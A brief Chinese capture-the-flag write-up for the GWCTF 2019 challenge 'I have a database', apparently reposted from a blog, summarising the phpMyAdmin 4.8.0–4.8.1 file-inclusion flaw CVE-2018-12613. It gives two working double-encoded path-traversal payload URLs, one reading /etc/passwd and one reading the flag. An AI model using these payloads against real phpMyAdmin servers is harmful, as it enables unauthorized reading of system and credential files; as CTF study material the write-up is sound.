GWCTF 2019]我有一个数据库

0x00 知识点

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞

影响版本:4.8.0——4.8.1

payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd

官方wp:
/index.php?target=db_sql.php%253f/../../../../../../../../flag

因为感冒状态太差了。。只能每天随便学学了。。

猜你喜欢

转载自www.cnblogs.com/wangtanzhi/p/12284857.html